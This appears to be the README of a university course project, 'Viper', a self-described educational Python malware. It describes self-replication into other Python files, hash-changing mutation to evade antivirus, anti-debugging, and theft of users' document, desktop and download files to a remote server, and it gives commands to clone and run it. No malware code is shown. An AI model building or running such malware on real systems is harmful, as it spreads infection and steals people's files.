Viper is a sophisticated multi-platform malware developed for educational and penetration testing purposes as part of UWA's Penetration Testing course. Designed to operate across Windows, Linux, and macOS, Viper showcases various malware techniques such as operating system detection, virus-like behaviour, mutation for evasion, data exfiltration, and anti-debugging mechanisms. Read the full writeup
Disclaimer: This project is for educational purposes only.
- Cross-platform compatibility (Windows, Linux, macOS)
- OS detection and customised behaviour
- Virus-like replication and mutation
- Stealthy data exfiltration to a remote server
- Anti-debugging measures
- Minimal user disruption to maintain stealth
-
Clone the repository:
git clone https://github.com/beugo/viper.git cd viper -
Install the required dependencies:
pip install -r requirements.txt
Viper detects the target operating system using Python's platform module and adapts its behaviour accordingly:
- Windows: Uses
ctypesfor pop-up messages and anti-debugging mechanisms. - Linux: Utilises
ZenityorTkinterfor displaying infection alerts. - macOS: Uses
osascriptto display pop-ups via AppleScript.
Viper replicates itself across Python files in the current directory and subdirectories. It employs a simple mutation mechanism to modify its genetic sequence, changing its hash with each replication to evade detection by antivirus software.
Viper stealthily collects files from the following directories:
- Windows:
Documents,Desktop,Downloads - Linux/macOS:
~/Documents,~/Desktop,~/Downloads
The files are then sent to a remote server via an obfuscated URL using the requests library.
On Windows, Viper includes anti-debugging measures that terminate the malware if a debugger is detected. It also implements a time-based exit to prevent extended analysis using tools like GDB.
Run the malware using Python:
python viper.pyEnsure you have the necessary permissions to execute the script, especially on Linux/macOS systems:
chmod +x viper.py